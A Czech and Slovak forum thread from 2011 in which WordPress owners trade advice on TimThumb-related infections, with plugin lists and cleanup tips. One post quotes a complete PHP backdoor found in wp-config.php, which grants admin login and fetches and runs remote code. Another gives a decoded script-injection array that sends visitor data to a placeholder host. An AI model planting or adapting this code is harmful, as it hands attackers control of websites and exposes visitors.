Virus ve wordpressu, napadene themes

Pred par dny jsem v jednom z wordpressu nasel virus (malware). Vypada to na vetsi problem. Dira je v knihovne TimThumb.php, kterou pouzivaji nektere themes a pluginy na upload. Utocnici pres nej zmeni javascript soubory (u me jquery) a nainstaluji backdoor.

Vypada to, ze nahrazeni TimThumb.php novou verzi uplne nepomuze, je treba zakazat $allowedSites, respektive vyrobit nulove pole... Jsem zvedav, jestli me zasahy pomohly a zitra bude web stale cisty.

Par odkazu:
http://sucuri.net/malware/malware-entry-mwjs2368
http://blog.sucuri.net/2011/08/timth...e-iceberg.html
http://markmaunder.com/2011/08/01/ze...dpress-themes/

---------- Příspěvek doplněn 31.08.2011 v 08:39 ----------

Seznam pluginu, ktere vyse uvedeny skript pouzivaji. Pokud je pouzivate, zkontrolujte verzi atd...

Kód:

a-gallery
dukapress
front-slider
geotag
highlighter
igit-posts-slider-widget
igit-related-posts-with-thumb-images-after-posts
islidex
jquery-slider-for-featured-content
kc-related-posts-by-category
lisl-last-image-slider
meenews
meenews-newsletter
mobile-smart
seo-image-galleries
shortcodes-ultimate
smart-related-posts-thumbnails
webphysiology-portfolio
wordpress-gallery-plugin
wp-mobile-detector
wp-slick-slider
shortcodes-ultimate
social-profiles-widget
woo-tumblog

---------- Příspěvek doplněn 31.08.2011 v 08:40 ----------

A zde nektere zname themes, ktere by mohly mit problem

Kód:

aqua-blue
bueno
canvas
deep-blue
flashnews
freshnews
magazinum
Magnificent
mymag
sportpress
TheStyle
wp-creativix
backstage
bueno
busybee
canvas
cinch
cityguide
coffeebreak
dailyedition
delegate
delicate
digitalfarm
ElegantEstate
flashnews
freshnews
gazette
headlines
magazinum
Magnificent
mystream
nomadic
object
openair
optimize
overeasy
premiumnews
retreat
royalle
slanted
sophisticatedfolio
sportpress
thejournal
thestation
TheStyle

Mno, Ta dira je znama cca 2 tydny. Co jsem zkousel, tak jsem nasel pres 50K zranitelnych webu. A nebyl jsem jediny ;)

Takze pokud jsi mel zranitelny web, tak urcite prekontroluj logy a zjisti co se delo.
Zkontroluj zmenene a pridane soubory.
Zmen hesla na FTP/MySql/WP
Projed databazi na podezrele veci...

Ahoj,

tak to vypadá že jsem měl/mám tento problém. Snažil jsem se malware nebo virus odstranit ale nevím jestli úspěšně.
Napadené byly šablony jak se píše, skript ze securi.net našel:

Kód:

Warning: Found suspicious file (timthumb or uploadify): ./wp-content/plugins/kish-multi-pro/uploadify/scripts/check.php
Warning: Found suspicious file (timthumb or uploadify): ./wp-content/plugins/kish-multi-pro/uploadify/scripts/uploadify.php

Plugin ihned smazán.

Dotazy:
1)Jak mám projet databázi na podezřelé věci? V Myphpadmin jsem fakt začátečník...
2)Zde jsem popsal celý postup jak jsem odstranil(pokoušel se) malware z blogu. Prosím o připomínky a další doporučení

Děkuji,
Bigdrobek

jsi na to sel tezkym kalibrem, reinstall wordpressu jsem nepotreboval. melo by stacit deaktivovat a smazat prislusne pluginy. v databazi jsem virus neobjevil a rucne pres phpmyadmin je to hodne pracne s nejistym vysledkem. Testoval bych web jeste par dni po zasahu na viry a kontroloval, zda se zmeni datum upravy souboru na ftp.

Jo začali přibývat soubory ve wordpressu (zjistil websitedefender) - byl jsem označen za malware. "Reinstalací wordpressu jsem myslel smazání všeho kromě fotek (adresář upload s blog.dir)... A stejně jsem včera večer objevil infikované index soubory index.php ....

Ve většině případů doporucuji nakopirovat pouze nove soubory na ftp, zkontrolovat a ponechat wp.config.php a pote znovu nainstalovat pluginy + se podivat na datum zmeny u souboru sablony a ty rucne zkontrolovat zda-li se na zacatku nebo na konci nenachazi iframe nebo js, zmenit hesla / db/ftp :-)

+ ve vetsine pripadu jsou infikovane soubory index.php

Problém jsem měl v září na 6 placených template...mě teda nasrali nicméně díky secure pluginu kde jsem s koupí váhal mi ihned na email došel warning a do hodiny se mi prohrabali na plotně vše ručně! vyčistili a updatovali a dali do pořádku a to se za 120 UDS ročně kurwa vyplatí než pak koukat jak Jarin na husí sádlo nebo se v tom hrabat.
Kdo chce si může proskenovat web taky jak píše buffy.cz zde http://sitecheck.sucuri.net/scanner/.
A ještě zde link

tak hlasim dalsi svini. tentokrat ne pres TimThumb.php :( Je to neco jineho. pluginy vypadaji ciste, mam podezreni na sablonu. Napadene byly vsechny i prazdne index.php, index.html a footer.php

---------- Příspěvek doplněn 23.11.2011 v 19:27 ----------

Zde jeden malware vc. Offensive html code, ktery jsem mel vlozen do souboru.

http://sakrare.ikyon.se/log.php?id=12396

Po rozkodovani to vola -- URL odstraněno --

Kazdopadne server nefunguje, takze to pousteji asi jednou za cas.

Mrkni sem, asi je to tohle....
This attack is related to the MW:JS:DEPACK one. http://wordpress.org/support/topic/f...are-_765258526

vcera jsem to komplet vycistil. podle toho stringu by to mohl byt on. kazdopadne stale nemam bezpecnostni diru kudy sel dovnitr.

Tak a máme tu identifikaci co se stalo a jak to vyčistit Clean Up “Cannot redeclare” Hack ....It seems closely related to the nefarious TimThumb hack,

dalsi napadeni wordpressu, premyslim o zmene sablony. dela mi to jeden wordpress asi z 30ti.

tentokrat napadene veskere JS soubory

virus:

--kod odstranen--

dekodovano

["sc_co","getElementById","colorDepth","width","hei ght","charset","location","referrer","userAgent"," script","createElement","id","src","http://x.x.x.x/s.php?ref=","&cls=","&sw=","&sh=","&dc=","&lc=","& ua=","head","getElementsByTagName","appendChild"]

zde nejake dalsi informace: http://dan.cx/blog/2011/11/pulling-apart-wordpress-hack

No to je super :D http://webtrh.cz/165978-virus-webtrhu

tak to sorry, kopiroval jsem to z jineho fora, netusil jsem. jeste jedno omluva. vlozit to do kodu nebo jak, aby to bylo videt?

Původně odeslal buffy.cz

tak to sorry, kopiroval jsem to z jineho fora, netusil jsem. jeste jedno omluva. vlozit to do kodu nebo jak, aby to bylo videt?

Idealne asi screen... ten by "antiviru" nemel vadit :D

vkladal jsem to cele kvuli vyhledavacum, podobny problem ma vice lidi a virus se po ceste nemeni.

Zdravím, predpokladám, že aj môj blog bol napadnutý nejaký malware. Jedného dňa z ničoho nič začali problémy - v administrácii blbne editor textov - príspevky sa skoro vôbec nedajú písať, keď chcem pridať obrázok tak ho do editora nenačíta, len zobrazi html kód, dakedy text ako keby zmizol a je viditeľný len po označení textu viď:

cez sucuri.net som našiel že vírus sa nachádza v súboroch:

Kód:

Malware found on javascript file: 
http://www.krjak.com/wp-includes/js/l10n.js?ver=20101110
http://www.krjak.com/wp-includes/js/jquery/jquery.js?ver=1.4.4 a

Predpokladám že bol napadnutý aj plugin Really simple Facebook Twitter share buttons pretože pod každým článkom sa mi zobrazuje chyba v týchto tlačidlách.

Som laik, vie mi niekto pomôcť ako tento problém vyriešiť ? :(

ďakujem

podivej se do tech napadenych souboru, na konci bude podezrely string... vkladat ho sem znovu nemuzu. v zasade by melo stacit nahradit prislusne JS soubory. vsimni si u nich data a casu zmeny. prolez ftp a podivej se, zda nebyly zmeneny jine soubory. podle casu lze napr. v logu neco dohledat. u me je to mesic zpet, takze logy uz nemam :(

mám ten samý problém. Něco napadlo javasriptové soubory:
Zkusil jsem to takto napravit:
1) http://sitecheck.sucuri.net/scanner/
2) projeď web scannem
3) vyhledej napadené soubory a přehraj je novými

nevím jestli to pomůže, ale na chvíli je web čistý než budu mít čas zjistit více...

bigdrobek: mam overeno, ze ten scanner nenajde vse. nasel mi jen zlomek js souboru, ktere nejspis pouzila uvodni stranka. ty .js soubory mam zavirovane komplet vsechny i u nefunkcnich pluginu a nefunkcnich themes!

Ahoj, taky jsem měl na jednom webu s WP 3.2.1. zavirované všechny!!! js soubory. Pomůže zablokovat přístup k FTP (viz wedos), nebo se to zavirovalo přes nějakou bezpečnostní chybu ve WP?

videl bych to na bezpecnostni chybu ve WP, respektive pluginu ci templates. na wedosu mam x wordpressu, zaviroval se mi jeden.

ted jsem našel kus kódu v wp-config.php na řádku 2000.
Netuším co to je, ale je to možná díra ke mně do webu nebo kod wp better security
Netušíte někdo co to je?

Kód:

if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == 'ed3ed3ed3ed3ed3ed3ed3ed3ed3ed3ed3'){
if ($_GET['pingnow']== 'login'){
$user_login = 'admin';
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action('wp_login', $user_login);
}
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}

To jsou zadní vrátka nebo-li trojský kůň.

Velmi pravděpodobně tohle dělá plugin Better WP Security. Kdo ho používáte podívejte se na řádek 2000 ve wp-config
Díky

Uvedený kód je trojský kůň - je tam vidět, že stahuje a spouští cizí skript. Dostal se tam tou chybou v TimThumb a s pluginem Better WP Security určitě nesouvisí.

timthumb vlna byla nekdy kolem meho prvniho prispevku. to jsem opravil a mam ted neco noveho... s tim wp security bych to taky nespojoval, to je cisty plugin

Ahoj, tak ten samý web opět kompletně zavirován. Tentokrát byly přepsány všechny php soubory a ještě jim byl přidělen atribut 444, nebo tak nějak. Škodlivý kód jsem objevil na prvním řádku, ale odsazený doprava, takže v okně editoru nebyl na první pohled vidět.

Tentokrát jsem celý web smazal a nahrál poslední čistou verzi WP + aktualizovanou šablonu Glow od ElegantThemes.

Zavirování se projevovalo tím, že mi chodily nějaký -trackback-, ani nevím co to je. Bohužel i po nové instalaci, se tento spam stále objevuje. Nevíte prosím někdo, co s tím?

Díky za jakoukoliv pomoc.
MH

Na zakázání trackbacku existuje plugin, nicméně se v posledních dnech objevili u několika klientů díky nezaktualizované WP napadené stránky s .httacessem a přesměrováním na cizí web, google to ihned rozpozná a zablokuje, takže Vám doporučuji vždy nezapomínat na aktualizace jak pluginů tak i šablon ale i celého WP včetně zabezpečení chmodu, už. jména, prefix tabulek, obměňovat hesla na ftp, nepoužívat nedůvěryhodné programy nebo do nich hesla neukládat

trackback je možné zakázat i v administraci nebo přímo u příspěvku. Ale přesto se to tam stále objevuje. Zjistil jsem však, že ten htaccess je tam 2x a z toho jeden nejde nijak upravovat, kopírovat ani smazat. Musel jsem požádat podporu o smazání. Tak jsem zvědavý jestli to pomůže.